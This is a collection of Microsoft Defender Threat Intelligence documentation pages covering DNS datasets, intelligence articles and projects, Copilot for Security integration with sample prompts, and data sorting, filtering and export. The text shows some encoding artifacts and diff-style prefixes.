-![Data Tab Services](media/dataTabServices.png)
-
-### DNS
-
-Microsoft has been collecting DNS records over the years, providing users insight into mail exchange (MX) records, nameserver (NS) records, text (TXT) records, start of authority (SOA) records, canonical name (CNAME) records, and pointer (PTR) records. Reviewing DNS records can be helpful to identify shared infrastructure used by actors across the domains they own. For example, actor groups tend to use the same nameservers to segment their infrastructure or the same mail exchange servers to administer their command and control.
-
-Our DNS data includes the following:
--- **Value:** the value of the DNS record.-- **First Seen:** a timestamp of the date that we first observed this record on the artifact.-- **Last Seen:** a timestamp of the date that we last observed this record on the artifact.-- **Type:** the type of infrastructure associated with the record. Potential options include Mail Servers (MX), text files (TXT), name servers (NS), CNAMES, and Start of Authority (SOA) records.-- **Tags:** any tags applied to this artifact in the Defender TI system.-
-![Data Tab DNS](media/dataTabDNS.png)
-
-### Reverse DNS
-
-While a forward DNS lookup queries the IP address of a certain hostname, a reverse DNS lookup queries a specific hostname of an IP address. This dataset will show comparable results as the DNS dataset. Reviewing DNS records can be helpful to identify shared infrastructure used by actors across the domains they own. For example, actor groups tend to use the same nameservers to segment their infrastructure or the same mail exchange servers to administer their command and control.
-
-Our reverse DNS data includes the following:
--- **Value:** the value of the Reverse DNS record.-- **First Seen:** a timestamp of the date that we first observed this record on the artifact.-- **Last Seen:** a timestamp of the date that we last observed this record on the artifact.-- **Type:** the type of infrastructure associated with the record. Potential options include Mail Servers (MX), text files (TXT), name servers (NS), CNAMES, and Start of Authority (SOA) records.-- **Tags:** any tags applied to this artifact in the Defender TI system.-
-![Data Tab Reverse DNS](media/dataTabReverseDNS.png)
-
-### Intelligence
-
-The intelligence section highlights any curated insights in the Defender TI platform, whether derived from our Research Team via Articles or your own team via Projects. The Intelligence section helps users understand key additional context behind a queried artifact; analysts can learn from the investigation efforts of the larger security community to jumpstart their own.
-
-![Data Tab Intelligence](media/dataTabIntelligence.png)
-
-### Articles
-
-The Articles section displays any articles that may provide insight on how to best investigate and ultimately disarm the impacted artifact. These articles are written by researchers who study the behavior of known threat actors and their infrastructure, surfacing key findings that can help others mitigate risk to their organization. In this example, the searched IP Address has been identified as an IOC that relates to the findings within the article.
-
-For more information, see [What is Microsoft Defender Threat Intelligence (Defender TI)?](index.md)
-
-![Data Tab Intelligence Articles](media/dataTabIntelligenceArticles.png)
-
-### Projects
-
-One of the primary byproducts from infrastructure analysis is almost always a set of indicators that tie back to a threat actor or group of actors. These indicators serve as a way of identifying threat actors when they initiate an attack campaign. Developing insight into adversaryΓÇÖs tactics, techniques, and procedures (TTPs) of how the threat actors operate. Projects provide a method to identify adversaries by their TTPs and to track how the adversaryΓÇÖs infrastructure is changing over time.
-
-When a user searches an IP address, domain, or host in Defender TI, if that indicator is listed within a project the user has access to, the user can select the Projects blade within the Intelligence section and navigate to the details of the project for more context about the indicator before reviewing the other data sets for more information.
-
-Visiting a project's details shows a listing of all associated artifacts and a detailed history that retains all the context described above. Users within the same organization no longer need to spend time communicating back and forth. Threat actor profiles can be built within Defender TI and serve as a "living" set of indicators. As new information is discovered or found, it can be added to that project.
-
-The Defender TI platform allows users to develop multiple project types for organizing indicators of interest and indicators of compromise from an investigation.
-
-For more information, see [Using projects](using-projects.md).
-
-![Data Tab Intelligence Projects](media/dataTabIntelligenceProjects.png)
-
-## Next steps
-
-For more information, see:
--- [Sorting, filtering, and downloading data](sorting-filtering-and-downloading-data.md)-- [Data sets](data-sets.md)-- [Reputation scoring](reputation-scoring.md)-- [Analyst insights](analyst-insights.md)-- [What is Microsoft Defender Threat Intelligence (Defender TI)?](index.md)-- [Using projects](using-projects.md)
threat-intelligence Security Copilot And Defender Threat Intelligence https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/threat-intelligence/security-copilot-and-defender-threat-intelligence.md
- Title: Microsoft Copilot for Security and Microsoft Defender Threat Intelligence
-description: Learn about Microsoft Defender Threat Intelligence capabilities embedded in Copilot for Security.
-keywords: security copilot, threat intelligence, defender threat intelligence, defender ti, copilot for security, embedded experience, vulnerability impact assessment, threat actor profile, plugins, Microsoft plugins
-----
- - Tier1
- - security-copilot
- Previously updated : 12/04/2023--
-# Microsoft Copilot for Security and Microsoft Defender Threat Intelligence
-
-Microsoft Copilot for Security is a cloud-based AI platform that provides natural language copilot experience. It can help support security professionals in different scenarios, like incident response, threat hunting, and intelligence gathering. For more information about what it can do, read [What is Microsoft Copilot for Security?](/security-copilot/microsoft-security-copilot).
-
-**Copilot for Security integrates with Microsoft Defender Threat Intelligence**
-
-Copilot for Security delivers information about threat actors, indicators of compromise (IOCs), tools, and vulnerabilities, as well as contextual threat intelligence from Microsoft Defender Threat Intelligence (Defender TI). You can use the prompts and promptbooks to investigate incidents, enrich your hunting flows with threat intelligence information, or gain more knowledge about your organization's or the global threat landscape.
-
-This article introduces you to Copilot and includes sample prompts that can help Defender TI users.
-
-## Know before you begin
-- You can use Copilot capabilities to surface threat intelligence in either the [Copilot for Security portal](#using-copilot-for-security-standalone-portal-to-get-threat-intelligence) or the [Microsoft Defender portal](#using-microsoft-copilot-in-defender-to-get-threat-intelligence). [Learn more about Copilot for Security experiences](/security-copilot/experiences-security-copilot)-- Be clear and specific with your prompts. You might get better results if you include specific threat actor names or IOCs in your prompts. It might also help if you add **threat intelligence** to your prompt, like:
- - Show me threat intelligence data for Aqua Blizzard.
- - Summarize threat intelligence data for "malicious.com."
-- Be specific when referencing an incident (for example, "incident ID 15324").-- Experiment with different prompts and variations to see what works best for your use case. Chat AI models vary, so iterate and refine your prompts based on the results you receive.-- Copilot for Security saves your prompt sessions. To see the previous sessions, from the Copilot [Home menu](/security-copilot/navigating-security-copilot#home-menu), go to **My sessions**.
-
- ![Partial screenshot of the Microsoft Copilot for Security Home menu with My sessions highlighted.](/defender/threat-intelligence/media/defender-ti-and-copilot/copilot-my-sessions.png)
-
- > [!NOTE]
- > For a walkthrough on Copilot, including the pin and share feature, read [Navigate Microsoft Copilot for Security](/security-copilot/navigating-security-copilot).
-
-[Learn more about creating effective prompts](/security-copilot/prompting-tips)
-
-## Using Copilot for Security standalone portal to get threat intelligence
-
-1. Go to [Microsoft Copilot for Security](https://go.microsoft.com/fwlink/?linkid=2247989) and sign in with your credentials.
-2. Make sure that the Defender TI plugin is turned on. In the prompt bar, select the **Sources** icon ![Screenshot of the Sources icon.](/defender/threat-intelligence/media/defender-ti-and-copilot/copilot-sources-icon.png).
-
- ![Screenshot of the prompt bar in Microsoft Copilot for Security with the Sources icon highlighted.](media/defender-ti-and-copilot/copilot-prompts-bar-sources.png)
-
-
- In the **Manage sources** pop-up window that appears, under **Plugins**, confirm that the **Microsoft Defender Threat Intelligence** toggle is turned on, then close the window.
-
- ![Screenshot of the Manage plugins pop-up window with the Microsoft Defender Threat Intelligence plugin highlighted.](media/defender-ti-and-copilot/copilot-manage-plugins.png)
-
- > [!NOTE]
- > Some roles can turn the toggle on or off for plugins like Defender TI. For more information, read [Manage plugins in Microsoft Copilot for Security](/security-copilot/manage-plugins).
-
-3. Enter your prompt in the prompt bar.
-
-### Built-in system features
-
-Copilot for Security has built-in system features that can get data from the different plugins that are turned on.
-
-To view the list of built-in system capabilities for Defender TI:
-
-1. In the prompt bar, select the **Prompts** icon ![Screenshot of the prompts icon.](/defender/threat-intelligence/media/defender-ti-and-copilot/copilot-prompts-icon.png).
-
- ![Screenshot of the prompt bar in Microsoft Copilot for Security with the Prompts icon highlighted.](media/defender-ti-and-copilot/copilot-prompts-bar-prompts.png)
-
-2. Select **See all system capabilities**. The *Microsoft Defender Threat Intelligence* section lists all the available capabilities for Defender TI that you can use.
-
-Copilot also has the following promptbooks that also deliver information from Defender TI:
-- **Threat actor profile** ΓÇô Generates a report profiling a known threat actor, including suggestions to defend against their common tools and tactics.-- **Vulnerability impact assessment** ΓÇô Generates a report summarizing the intelligence for a known vulnerability, including steps on how to address it.-
-To view these promptbooks, in the prompt bar, select the **Prompts** icon then select **See all promptbooks**.
-
-### Sample prompts for Defender TI
-
-You can use many prompts to get information from Defender TI. This section lists some ideas and examples.
-
-#### General information about threat intelligence trends
-
-Get threat intelligence from threat articles and threat actors.
-
-**Sample prompts** :
--- Summarize the recent threat intelligence.-- Show me the latest threat articles.-- Get threat articles related to ransomware in the last six months.-
-#### IP address and host contextual information in relation to threat intelligence
-
-Get information on datasets associated with IP addresses and hosts, such as ports, reputation scores, components, certificates, cookies, services, and host pairs.
-
-**Sample prompts**:
--- Show me the reputation of the host _\<host name\>_.-- Get resolutions for IP address _\<IP address\>_.-
-#### Threat actor mapping and infrastructure
-Get information on threat actors and the tactics, techniques, and procedures (TTPs), sponsored states, industries, and IOCs associated with them.
-
-**Sample prompts**:
--- Tell me more about Silk Typhoon.-- Share the IOCs associated with Silk Typhoon.-- Share the TTPs associated with Silk Typhoon.-- Share threat actors associated with Russia.-
-#### Vulnerability data by CVE
-
-Get contextual information and threat intelligence on Common Vulnerabilities and Exposures (CVEs).
-
-**Sample prompts**:
--- Share the technologies that are susceptible to the vulnerability CVE-2021-44228.-- Summarize the vulnerability CVE-2021-44228.-- Show me the latest CVEs.-- Show me threat actors associated with CVE-2021-44228.-- Show me the threat articles associated with CVE-2021-44228.-
-### Provide feedback
-
-Your feedback on the Defender TI integration with Copilot for Security helps with development. To provide feedback, in Copilot, select **HowΓÇÖs this response?** At the bottom of each completed prompt and choose any of the following options:
-- **Looks right** - Select this button if the results are accurate, based on your assessment. -- **Needs improvement** - Select this button if any detail in the results is incorrect or incomplete, based on your assessment. -- **Inappropriate** - Select this button if the results contain questionable, ambiguous, or potentially harmful information.-
-For each feedback button, you can provide more information in the next dialog box that appears. Whenever possible, and when the result is **Needs improvement**, write a few words explaining what can be done to improve the outcome. If you entered prompts specific to Defender TI and the results aren't related, then include that information.
-
-## Using Microsoft Copilot in Defender to get threat intelligence
-
-Copilot for Security customers gain for each of their authenticated Copilot users access to Defender TI within the Microsoft Defender portal. To ensure that you have access to Copilot, see the [Copilot for Security purchase and licensing information](/security-copilot/faq-security-copilot).
-
-Once you have access to Copilot for Security, the key features discussed in the next section become accessible in the following *Threat intelligence* sections of the Defender portal:
-- Threat analytics-- Intel profiles-- Intel explorer-- Intel projects-
-### Key features
-Copilot in Defender brings Copilot for SecurityΓÇÖs capability to look up threat intelligence into the portal, letting security teams understand, prioritize, and take action on threat intelligence information immediately.
-
-You can ask about a threat actor, attack campaign, or any other threat intelligence that you want to know more about, and Copilot generates responses based on threat analytics reports, intel profiles and articles, and other Defender TI content. You can also select any of the available built-in prompts that let you do the following actions:
-- [Summarize](using-copilot-threat-intelligence-defender-xdr.md#summarize-the-latest-threats-related-to-your-organization) the latest threats related to your organization-- [Prioritize](using-copilot-threat-intelligence-defender-xdr.md#prioritize-which-threats-to-focus-on) which threats to focus on based on your environment's highest exposure level to these threats-- [Ask](using-copilot-threat-intelligence-defender-xdr.md#ask-about-the-threat-actors-targeting-the-communications-infrastructure) about the threat actors targeting the communications infrastructure-
-[Learn more about using Copilot in Defender for threat intelligence](using-copilot-threat-intelligence-defender-xdr.md)
-
-## Data processing and privacy
-
-When you interact with Copilot for Security to get Defender TI data, Copilot pulls that data from Defender TI. The prompts, the data retrieved, and the output shown in the prompt results are processed and stored within the Copilot service. [Learn more about privacy and data security in Microsoft Copilot for Security](/security-copilot/privacy-data-security)
-
-### See also
-- [What is Microsoft Copilot for Security?](/security-copilot/microsoft-security-copilot)-- [Privacy and data security in Microsoft Copilot for Security](/security-copilot/privacy-data-security)-- [Using Microsoft Copilot for Security for threat intelligence](using-copilot-threat-intelligence-defender-xdr.md)
threat-intelligence Sorting Filtering And Downloading Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/threat-intelligence/sorting-filtering-and-downloading-data.md
-
Title: 'Sorting, filtering, and downloading data using Microsoft Defender Threat Intelligence (Defender TI)'
-description: 'Learn how to sort, filter and download data using Microsoft Defender Threat Intelligence (Defender TI).'
----- Previously updated : 08/02/2022---
-# Sorting, filtering, and downloading data
-
-The Microsoft Defender Threat Intelligence (Defender TI) platform enables analysts to access our vast collection of crawling data in an indexed and pivot table format. These data sets can be very large, returning expansive amounts of historic and recent data. Thus, allowing analysts to appropriately sort and filter the data provides the ability easily to surface the connections of interest.
-
-![Sorting DataSets Chrome Screenshot](media/sortingDataSetsChromeScreenshot.png)
-
-In this how-to article, youΓÇÖll learn how to sort and filter data for the following data sets:
--- Resolutions-- WHOIS-- Certificates-- Subdomains-- Trackers-- Components-- Host Pairs-- Cookies-- Services-- DNS-- Reverse DNS-
-For more information, see [Data sets](data-sets.md).
-
-In this how-to article, youΓÇÖll also learn how to download indicators/artifacts from the following features:
--- Projects-- Articles-- Data Sets-
-## Prerequisites
--- A Microsoft Entra ID or personal Microsoft account. [Login or create an account](https://signup.microsoft.com/)-- A Microsoft Defender Threat Intelligence (Defender TI) Premium license.
- > [!NOTE]
- > Users without a Defender TI Premium license will still be able to log into the Defender Threat Intelligence Portal and access our free Defender TI offering.
-
-## Open Defender TIΓÇÖs Threat Intelligence Home Page
-
-1. Access the [Defender Threat Intelligence Portal](https://ti.defender.microsoft.com/).
-2. Complete Microsoft authentication to access portal.
-
-## Sorting data
-
-The sorting function on the Data tab enables users to quickly sort our datasets by the column values. By default, most results are sorted by ΓÇ£Last SeenΓÇ¥ (descending) so that the most recently observed results appear at the top of the list; this surfaces the most recent data to immediately provide insight on the current infrastructure of an artifact. Currently, all data sets are sortable by the following ΓÇ£First SeenΓÇ¥ and ΓÇ£Last SeenΓÇ¥ values:
--- Last Seen Descending (Default)-- Last Seen Ascending-- First Seen Ascending-- First Seen Descending-
-Data can be sorted across each data set blade within the Data tab for each IP, domain, or host entity that is searched or pivoted on.
-
-1. Search a domain, IP address, or host in the Defender TI Threat Intelligence search bar and navigate to the Data tab.
-2. Apply sorting preferences to the First Seen and Last Seen columns within the Resolutions Data blade.
-
-![Sorting Resolutions](media/sortingResolutions.gif)
-
-## Filtering data
-
-Data filtering allows analysts to access a select group of data based on a particular metadata value. For instance, an analyst can select to only view IP resolutions discovered from a select source, or components of a particular type (e.g. servers, frameworks). This enables users to narrow the query results to items of particular interest. Since the Threat Intelligence platform provides specific metadata that coincides with particular data types, the filter options will be different for each data set.
-
-## Resolution filters
-
-The following filters apply to resolution data:
--- **System Tag**: these tags are created by the Threat Intelligence system based on insights discovered by our research team.-- **Tag**: tags that have been applied by Threat Intelligence users.-- **ASN**: results that relate to a designated Autonomous System Number (ASN).-- **Network**: results that relate to designated network.-- **Source**: the data source that produced the result (e.g. riskiq, emerging_threats).-
-1. Search a domain, IP address, or host in the Defender TI Threat Intelligence search bar and navigate to the Data tab.
-2. Apply filters to each of the types of filter options noted above within the Resolutions Data blade.
-
-![Filters Resolutions](media/filtersResolutions.gif)
-
-## Tracker filters
-
-The following filters apply to tracker data:
--- **Type**: the identified tracker type for each artifact (e.g. JarmFuzzyHash, GoogleAnalyticsID).-- **Address**: the IP address that directly observed the tracker or has a resolving host that observed the tracker. (Appears when searching an IP address)-- **Hostname**: the host that observed this tracker value. (Appears when searching a domain or host)-
-1. Search a domain, IP address, or host in the Defender TI Threat Intelligence search bar and navigate to the Data tab.
-2. Navigate to the Trackers Data blade.
-3. Apply filters to each of the types of filter options noted above within the Trackers Data blade.
-
-![Filters Trackers](media/filtersTrackers.gif)
-
-## Component filters
-
-The following filters apply to component data:
--- **Ipaddressraw:** the IP address that coincides with the returned hostname.-- **Type:** the designated component type (e.g. remote access, operating system).-- **Name:** the name of the detected component (e.g. Cobalt Strike, PHP).-
-1. Search a domain, IP address, or host in the Defender TI Threat Intelligence search bar and navigate to the Data tab.
-2. Navigate to the Components Data blade.
-3. Apply filters to each of the types of filter options noted above within the Components Data blade.
-
-![Filters Components](media/filtersComponents.gif)
-
-## Host pair filters
-
-The following filters apply to host pair data:
--- **Direction:** the direction of the observed connection. This indicates whether the parent redirects to the child or vice versa.-- **Parent Hostname:** the hostname of the parent artifact.-- **Cause:** the detected cause of the host parent / child relationship (e.g. redirect, iframe.src).-- **Child Hostname:** the hostname of the child artifact.-
-1. Search a domain, IP address, or host in the Defender TI Threat Intelligence search bar and navigate to the Data tab.
-2. Navigate to the Host Pairs Data blade.
-3. Apply filters to each of the types of filter options noted above within the Host Pairs Data blade.
-
-![Filters Host Pairs](media/filtersHostPairs.gif)
-
-## DNS & Reverse DNS filters
-
-The following filters apply to DNS and Reverse DNS data:
--- **Record Type:** the type of record detected in the DNS record (e.g. NS, CNAME).-- **Value:** the designated value of the record (e.g. nameserver.host.com).-
-1. Search a domain, IP address, or host in the Defender TI Threat Intelligence search bar and navigate to the Data tab.
-2. Navigate to the DNS and later, Reverse DNS Data blades.
-3. Apply filters to each of the types of filter options noted above within the DNS and Reverse DNS Data blades.
-
-![Filters DNS](media/filtersDNS.gif)
-
-## Downloading data
-
-In Defender TI, there are various sections that a user can download data as a csv export. Users need to look out for the download icon to export data as a csv.
-
-![Download Icon](media/downloadIcon.png)
-
-Data can be downloaded within the following sections:
--- Most Data Set blades-- Project-- Threat Intelligence Article-
-The following headers are exported as a result of downloading Resolutions, DNS, and reverse DNS data:
-
-| &nbsp; | &nbsp; |
-|-|-|
-| **Resolve** | A record associated with the domain searched (resolving IP Address) or domain that has resolved to an IP address when an IP address is searched |
-| **Location** | Country/region the IP address is hosted in |
-| **Network** | Netblock or subnet |
-| **autonomousSystemNumber** | Autonomous System Number |
-| **firstSeen** | Date / Time when Microsoft first observed the resolution (format: mm/dd/yyyy hh:mm) |
-| **lastSeen** | Date / Time when Microsoft last observed the resolution (format: mm/dd/yyyy hh:mm) |
-| **Source** | Source that observed this resolution |
-| **Tags** | Custom or system tags associated with the artifact |
-
-The following headers are exported as a result of downloading Subdomains data:
-
-| &nbsp; | &nbsp; |
-|-|-|
-| **hostname** | Subdomain of the domain searched |
-| **tags** | Custom or system tags associated with the artifact |
-
-The following headers are exported as a result of downloading Trackers data:
-
-| &nbsp; | &nbsp; |
-|-|-|
-| **hostname** | Hostname that observed or is currently observing the tracker |
-| **firstSeen** | Date / Time when Microsoft first observed the hostname was using the tracker (format: mm/dd/yyyy hh:mm) |
-| **lastSeen** | Date / Time when Microsoft first observed the hostname was using the tracker (format: mm/dd/yyyy hh:mm) |
-| **attributeType** | Type of tracker |
-| **attributeValue** | Tracker value |
-| **Tags** | Custom or system tags associated with the artifact |
-
-The following headers are exported as a result of downloading Components data:
-
-| &nbsp; | &nbsp; |
-|-|-|
-| **hostname** | Hostname that observed or is currently observing the component |
-| **firstSeen** | Date / Time when Microsoft first observed the hostname was using the tracker (format: mm/dd/yyyy hh:mm |
-| **lastSeen** | Date / Time when Microsoft last observed the hostname was using the component (format: mm/dd/yyyy hh:mm |
-| **category** | Type of component |
-| **name** | Name of the component |
-| **version** | Version of the component |
-| **Tags** | Custom or system tags associated with the artifact |
-
-The following headers are exported as a result of downloading Host Pairs data:
-
-| &nbsp; | &nbsp; |
-|-|-|
-| **parentHostname** | The hostname that is reaching out to the child hostname |
-| **childHostname** | The hostname that is feeding assets they host to the parent hostname. |
-| **firstSeen** | Date / Time when Microsoft first observed the relationship between the parent and child hostname (format: mm/dd/yyyy hh:mm) |
-| **lastSeen** | Date / Time when Microsoft last observed the relationship between the parent and child hostname (format: mm/dd/yyyy hh:mm) |
-| **attributeCause** | The cause of the relationship between the parent and child hostname |
-| **Tags** | Custom or system tags associated with the artifact |
--
-The following headers are exported as a result of downloading Cookies data:
-
-| &nbsp; | &nbsp; |
-|-|-|
-| **hostname** | Hostname that observed the Cookie name |
-| **firstSeen** | When the Cookie name was first observed to the hostname originating from the Cookie Domain (format: mm/dd/yyyy hh:mm) |
-| **lastSeen** | Date / time when the Cookie name was last observed to the hostname originating from the Cookie Domain (format: mm/dd/yyyy hh:mm) |
-| **cookieName** | Name of the cookie |
-| **cookieDomain** | The domain nameΓÇÖs server the cookie name originated from |
-| **Tags** | Custom or system tags associated with the artifact |
-
-The following headers are exported as a result of downloading projects lists for my, team, and shared projects:
-
-| &nbsp; | &nbsp; |
-|-|-|
-| **name** | Name of project |
-| **artifacts (count)** | Count of artifacts within the project |
-| **created by (user)** | User who created the project |
-| **created on** | When the project was created |
-| **tags** | Custom or system tags associated with the artifact |
-| **collaborators** | Who has been added as collaborator(s) to the project. This is only visible for projects that have been downloaded from the My Projects and Shared Projects pages. |
-
-The following headers are exported as a result of downloading project details (artifacts) from a project:
-
-| &nbsp; | &nbsp; |
-|-|-|
-| **artifact** | Artifact value (e.g. IP address, domain, host, WHOIS value, certificate SHA-1, etc.) |
-| **type** | Type of artifact (e.g. IP, domain, host, WHOIS Organization, WHOIS Phone, Certificate SHA-1, etc.) |
-| **created** | Date / Time when the artifact was added to the project (format: mm/dd/yyyy hh:mm) |
-| **creator** | Email address of user who added the artifact |
-| **context** | How the artifact was added to the project |
-| **tags** | Custom or system tags associated with the artifact |
-| **collaborators** | Who has been added as collaborator(s) to the project. This is only visible for projects that have been downloaded from the My Projects and Shared Projects pages. |
-
-The following headers are exported as a result of downloading threat intelligence public or riskiq indicators:
-
-| &nbsp; | &nbsp; |
-|-|-|
-| **type** | Type of indicator (e.g. ip, certificate, domain, _sha256) |
-| **value** | Value of the indicator (e.g. IP address, domain, hostname) |
-| **source** | Source of indicator (RiskIQ or OSINT) |
-
-## Next steps
-
-For more information, see [Data sets](data-sets.md).
threat-intelligence Using Copilot Threat Intelligence Defender Xdr https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/threat-intelligence/using-copilot-threat-intelligence-defender-xdr.md
- Title: Use Microsoft Copilot for Security for threat intelligence
-description: Learn about Copilot for Security embedded experience in Microsoft Defender for Microsoft Defender Threat Intelligence.
-keywords: security copilot, threat intelligence, defender threat intelligence, defender ti, copilot for security, embedded experience, vulnerability impact assessment, threat actor profile, plugins, Microsoft plugins
-----
- - Tier1
- - security-copilot
- Previously updated : 04/01/2024--
-# Using Microsoft Copilot for Security for threat intelligence
-
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-Microsoft Copilot in Defender applies the capabilities of [Microsoft Copilot for Security](/security-copilot/microsoft-security-copilot) to deliver Microsoft Defender Threat Intelligence (Defender TI) information about threat actors and tools, as well as contextual threat intelligence, directly into the Microsoft Defender portal. Based on threat analytics reports, intel profiles, and other available Defender TI content, you can use Copilot in Defender to summarize the latest threats affecting your organization, know which threats to prioritize based on your exposure level, or gain more knowledge about your organization's or the global threat landscape.
-
-> [!NOTE]
-> Defender TI capabilities are also available in Copilot for Security standalone experience through the Microsoft Defender Threat Intelligence plugin. [Learn more about Defender TI integration with Copilot for Security](security-copilot-and-defender-threat-intelligence.md)
-
-## Technical requirements
-
-Copilot for Security customers gain for each of their authenticated Copilot users access to Defender TI within the Defender portal. [Learn how you can get started with Copilot for Security](/security-copilot/get-started-security-copilot)
-
-## Accessing Copilot in Defender for threat intelligence content
-
-You can experience Copilot for SecurityΓÇÖs capability to look up threat intelligence in the following pages of the Defender portal:
-- Threat analytics-- Intel profiles-- Intel explorer-- Intel projects-
-## Try your first request
-1. Open any of the pages mentioned previously from the Defender portal navigation bar. The Copilot side pane appears on the right hand side.
-
- :::image type="content" source="/defender/threat-intelligence/media/defender-ti-and-copilot/copilot-defender-side-pane.png" alt-text="Screenshot of the Microsoft Defender portal Threat analytics page with the open Microsoft Copilot in Defender side pane highlighted." lightbox="/defender/threat-intelligence/media/defender-ti-and-copilot/copilot-defender-side-pane.png":::
-
- You can also reopen Copilot by selecting the **Copilot icon** ![Screenshot of the Copilot icon in the Microsoft Defender portal.](media/defender-ti-and-copilot/copilot-defender-icon.png) at the top of the page.
-2. In the Copilot prompt bar, ask about a threat actor, attack campaign, or any other threat intelligence that you want to know more about, then select the **Send message** icon ![Screenshot of the Send message icon in Copilot in Defender.](medi#sample-prompts-for-defender-ti)
-
-3. Copilot generates a response from your text instruction or question. While Copilot is generating, you can cancel the response by selecting **Stop generating**.
-
- ![Screenshot of Copilot in Defender generating a response to the prompt "Give me an overview of the latest threats to my organization".](media/defender-ti-and-copilot/copilot-defender-generate-response.png)
-
-4. Review the generated response. Copilot typically generates responses that include summaries and links to related Defender TI intel profiles and articles.
-
- ![Partial screenshot of a response generated by Copilot in Defender.](media/defender-ti-and-copilot/copilot-defender-response.png)
-
-5. You can provide feedback about the generated response by selecting the **Provide feedback** icon ![Screenshot of the Provide feedback icon in Copilot in Defender.](media/defender-ti-and-copilot/copilot-defender-feedback.png) and choosing **Confirmed, it looks great**; **Off-target, inaccurate**; or **Potentially harmful, inappropriate**. [Learn more](/microsoft-365/security/defender/security-copilot-in-microsoft-365-defender#data-security-and-feedback-in-copilot)
-6. To start a new chat session with Copilot, select the **New chat** icon ![Screenshot of the New chat icon in Copilot in Defender.](media/defender-ti-and-copilot/copilot-defender-new-chat.png).
-
-> [!NOTE]
-> Copilot saves your sessions from the Defender portal in the [Copilot for Security standalone portal](https://go.microsoft.com/fwlink/?linkid=2247989). To see the previous sessions, from the Copilot [Home menu](/security-copilot/navigating-security-copilot#home-menu), go to **My sessions**. [Learn more about navigating Microsoft Copilot for Security](/security-copilot/navigating-security-copilot)
-
-> [!IMPORTANT]
-> Copilot in Defender starts a new chat session every time you navigate to a different *Threat intelligence* page (for example, when you go from *Threat analytics* to *Intel profiles*) in the Defender portal. If you wish to go back or continue a previous session, go to the Copilot for Security standalone portal.
-
-## Use the built-in Defender TI prompts
-
-Copilot in Defender also has the following built-in prompts when accessing the *Threat intelligence* pages to get you started:
--- [Summarize](#summarize-the-latest-threats-related-to-your-organization)-- [Prioritize](#prioritize-which-threats-to-focus-on)-- [Ask](#ask-about-the-threat-actors-targeting-the-communications-infrastructure)--
-### Summarize the latest threats related to your organization
-Gathering and digesting threat intelligence data and trends can be a daunting task, especially when they come from multiple data sets and sources. Choose the **Summarize** prompt if you want Copilot to give you an overview of the latest threats in your environment. Copilot lists and summarizes relevant campaigns, activities, and threat actors, and includes links to related threat analytics reports or intel profiles for more information.
-
-### Prioritize which threats to focus on
-Copilot provides insights on which threats you should prioritize and focus on based on your environment's highest exposure level to these threats. Choose the **Prioritize** prompt if you want to find out which threats are likely to significantly impact your organization. This prompt gives you a starting point and could thus make triaging, investigating, and mitigating incidents less complex.
-
-### Ask about the threat actors targeting the communications infrastructure
-
-An important aspect of threat intelligence is keeping up to date with the global threat landscape. Choose the **Ask** prompt if you want Copilot to summarize the latest threat articles about threat actors that target the communications infrastructure so you can gather information on their latest TTPs or campaigns, and promptly assess and apply mitigation or prevention strategies.
-
-### See also
-- [What is Microsoft Copilot for Security?](/security-copilot/microsoft-security-copilot)-- [Microsoft Copilot for Security and Microsoft Defender Threat Intelligence](security-copilot-and-defender-threat-intelligence.md)
threat-intelligence Using Projects https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/threat-intelligence/using-projects.md
-
Title: 'Using Projects with Microsoft Defender Threat Intelligence (MDTI)'
-description: 'Learn how to manage projects using Microsoft Defender Threat Intelligence (MDTI).'
----- Previously updated : 08/02/2022---
-# Using projects
-
-The Microsoft Defender Threat Intelligence (Defender TI) platform allows users to develop private personal or team project types for organizing indicators of interest and indicators of compromise from an investigation. Projects contain a listing of all associated artifacts and a detailed history that retains the names, descriptions, collaborators, and monitoring profiles.
-
-When a user searches an IP address, domain, or host in Defender TI, if that indicator is listed within a project the user has access to, the user can select the Projects blade within the Intelligence section and navigate to the details of the project for more context about the indicator before reviewing the other data sets for more information. Alternatively, users can view their private team projects by selecting the Projects icon on the left-hand menu pane.
-
-Visiting a project's details shows a listing of all associated artifacts and a detailed history that retains all the context described above. Users within the same organization no longer need to spend time communicating back and forth. Threat actor profiles can be built within Defender TI and serve as a "living" set of indicators. As new information is discovered or found, it can be added to that project.
-
-The Defender TI platform allows users to develop multiple project types for organizing indicators of interest and indicators of compromise from an investigation.
-
-The owner of a project can add collaborators (users listed in their Azure tenant with a Defender TI Premium license). This grants the collaborator(s)ΓÇÖ permissions to make any changes to the project as if they were the owner of the project. The exception being that collaborators cannot delete projects. Collaborators will view projects that have been shared with them in the Shared Projects section of the Projects Home Page.
-
-Users can also download artifacts within a project by selecting the download icon. This is a great way for threat hunting teams to use their findings from an investigation to block indicators of compromise or build additional detection rules within their SIEM.
-
-**Questions Projects May Help Answer:**
--- Has one of my fellow team members created a Team project that includes this indicator?-
- - If so, what other related indicators of compromise has this team member captured and what description as well as tags did they include to describe the type of investigation?
--- When did this team member last edit the project?-
- ![Projects Detailed Project Chrome Screenshot](media/projectsDetailedProjectChromeScreenshot.png)
-
-## Prerequisites
--- A Microsoft Entra ID or personal Microsoft account. [Login or create an account](https://signup.microsoft.com/)-- A Microsoft Defender Threat Intelligence (Defender TI) Premium license.
- > [!NOTE]
- > Users without a Defender TI Premium license will still be able to log into the Defender Threat Intelligence Portal and access our free Defender TI offering.
-
-## Open Defender TIΓÇÖs Threat Intelligence Home Page
-
-1. Access the [Defender Threat Intelligence Portal](https://ti.defender.microsoft.com/).
-2. Complete Microsoft authentication to access portal.
-
-## Creating a Project
-
-Users can create a project in two different ways, through the Projects Home Page or while investigating results.
-
-When logging into the Defender TI Projects Home Page, users are presented with a dashboard showing projects they own or that have been shared with other Defender TI users in their tenant. Directly from this view, users can decide to create a new project, simply by selecting the "+" icon or visit the project page using the left-hand drawer menu.
-
-1. To create a project from the Project Home Page, navigate to the ΓÇÿProjectsΓÇÖ icon and select the ΓÇÿAdd New ProjectΓÇÖ icon within the Projects Home Page.
-
- ![Add to Project](media/projectsAddProject.png)
-
- When conducting searches within Defender TI, users can select ΓÇÿAdd to ProjectΓÇÖ to add the artifact (indicator of compromise) to an existing project or create a new project to add the artifact to.
-
